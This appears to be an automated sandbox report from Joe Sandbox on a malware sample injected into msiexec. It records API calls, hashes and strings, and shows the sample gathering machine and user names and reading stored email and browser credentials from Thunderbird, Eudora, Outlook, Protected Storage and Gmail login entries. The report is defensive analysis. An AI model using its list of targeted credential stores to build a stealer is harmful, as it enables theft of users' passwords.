                                                                            • String ID: WinPos
                                                                            • API String ID: 4036792311-2823255486
                                                                            • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                            • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                            • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                            • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                            • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@DeleteObject
                                                                            • String ID: r!A
                                                                            • API String ID: 1103273653-628097481
                                                                            • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                            • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                            APIs
                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                            • wcsrchr.MSVCRT ref: 0040DCE9
                                                                            • wcscat.MSVCRT ref: 0040DCFF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FileModuleNamewcscatwcsrchr
                                                                            • String ID: _lng.ini
                                                                            • API String ID: 383090722-1948609170
                                                                            • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                            • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                            • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                            • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                            • API String ID: 2773794195-880857682
                                                                            • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                            • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                            • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                            • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                            • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                            • memset.MSVCRT ref: 0042BAAE
                                                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID:
                                                                            • API String ID: 438689982-0
                                                                            • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                            • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                            APIs
                                                                              • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$memset
                                                                            • String ID:
                                                                            • API String ID: 1860491036-0
                                                                            • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                            • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                            APIs
                                                                            • wcslen.MSVCRT ref: 0040A8E2
                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                            • free.MSVCRT ref: 0040A908
                                                                            • free.MSVCRT ref: 0040A92B
                                                                            • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free$memcpy$mallocwcslen
                                                                            • String ID:
                                                                            • API String ID: 726966127-0
                                                                            • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                            • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                            APIs
                                                                            • wcslen.MSVCRT ref: 0040B1DE
                                                                            • free.MSVCRT ref: 0040B201
                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                            • free.MSVCRT ref: 0040B224
                                                                            • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free$memcpy$mallocwcslen
                                                                            • String ID:
                                                                            • API String ID: 726966127-0
                                                                            • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                            • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                            APIs
                                                                            • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                              • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                            • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                            • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                            • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcmp$memcpy
                                                                            • String ID:
                                                                            • API String ID: 231171946-0
                                                                            • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                            • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                            • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                            • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                            APIs
                                                                            • strlen.MSVCRT ref: 0040B0D8
                                                                            • free.MSVCRT ref: 0040B0FB
                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                            • free.MSVCRT ref: 0040B12C
                                                                            • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free$memcpy$mallocstrlen
                                                                            • String ID:
                                                                            • API String ID: 3669619086-0
                                                                            • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                            • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@
                                                                            • String ID:
                                                                            • API String ID: 1033339047-0
                                                                            • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                            • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                            • malloc.MSVCRT ref: 00417407
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                            • free.MSVCRT ref: 00417425
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                            • String ID:
                                                                            • API String ID: 2605342592-0
                                                                            • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                            • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcslen$wcscat$wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1961120804-0
                                                                            • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                            • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                            • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                            • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                            Execution Graph

                                                                            Execution Coverage:2.1%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:0.5%
                                                                            Total number of Nodes:759
                                                                            Total number of Limit Nodes:20

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040832F
                                                                            • memset.MSVCRT ref: 00408343
                                                                            • memset.MSVCRT ref: 0040835F
                                                                            • memset.MSVCRT ref: 00408376
                                                                            • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                            • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                            • strlen.MSVCRT ref: 004083E9
                                                                            • strlen.MSVCRT ref: 004083F8
                                                                            • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                            • String ID: 5$H$O$b$i$}$}
                                                                            • API String ID: 1832431107-3760989150
                                                                            • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                            • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                            • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                            • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                            Control-flow Graph

                                                                            control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 346 407f86-407f88 343->346 344->346 346->342
                                                                            APIs
                                                                            • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                            • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                            • strlen.MSVCRT ref: 00407F5C
                                                                            • strlen.MSVCRT ref: 00407F64
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindstrlen$FirstNext
                                                                            • String ID: ACD
                                                                            • API String ID: 379999529-620537770
                                                                            • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                            • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                            • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                            • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 00401E8B
                                                                            • strlen.MSVCRT ref: 00401EA4
                                                                            • strlen.MSVCRT ref: 00401EB2
                                                                            • strlen.MSVCRT ref: 00401EF8
                                                                            • strlen.MSVCRT ref: 00401F06
                                                                            • memset.MSVCRT ref: 00401FB1
                                                                            • atoi.MSVCRT(?), ref: 00401FE0
                                                                            • memset.MSVCRT ref: 00402003
                                                                            • sprintf.MSVCRT ref: 00402030
                                                                            • memset.MSVCRT ref: 00402086
                                                                            • memset.MSVCRT ref: 0040209B
                                                                            • strlen.MSVCRT ref: 004020A1
                                                                            • strlen.MSVCRT ref: 004020AF
                                                                            • strlen.MSVCRT ref: 004020E2
                                                                            • strlen.MSVCRT ref: 004020F0
                                                                            • memset.MSVCRT ref: 00402018
                                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                            • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                            • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                            • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                            • API String ID: 3833278029-4223776976
                                                                            • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                            • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                            • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                            • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                              • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                              • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                              • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                            • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                            • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                            • API String ID: 745651260-375988210
                                                                            • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                            • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                            • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                            • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                            • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                            • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                            • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                            Strings
                                                                            • PStoreCreateInstance, xrefs: 00403C44
                                                                            • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                            • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                            • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                            • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                            • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                            • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                            • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                            • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                            • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                            • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                            • pstorec.dll, xrefs: 00403C30
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                            • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                            • API String ID: 1197458902-317895162
                                                                            • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                            • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                            • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                            • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                            Control-flow Graph

                                                                            control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 239 444c80-444c85 236->239 240 444c9f-444ca3 236->240 245 444d02-444d0d __setusermatherr 237->245 246 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->246 239->234 243 444c8c-444c93 239->243 240->234 241 444ca5-444ca7 240->241 244 444cad-444cb0 241->244 243->234 247 444c95-444c9d 243->247 244->237 245->246 250 444da4-444da7 246->250 251 444d6a-444d72 246->251 247->244 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                            • String ID: k:v
                                                                            • API String ID: 3662548030-4078055367
                                                                            • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                            • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
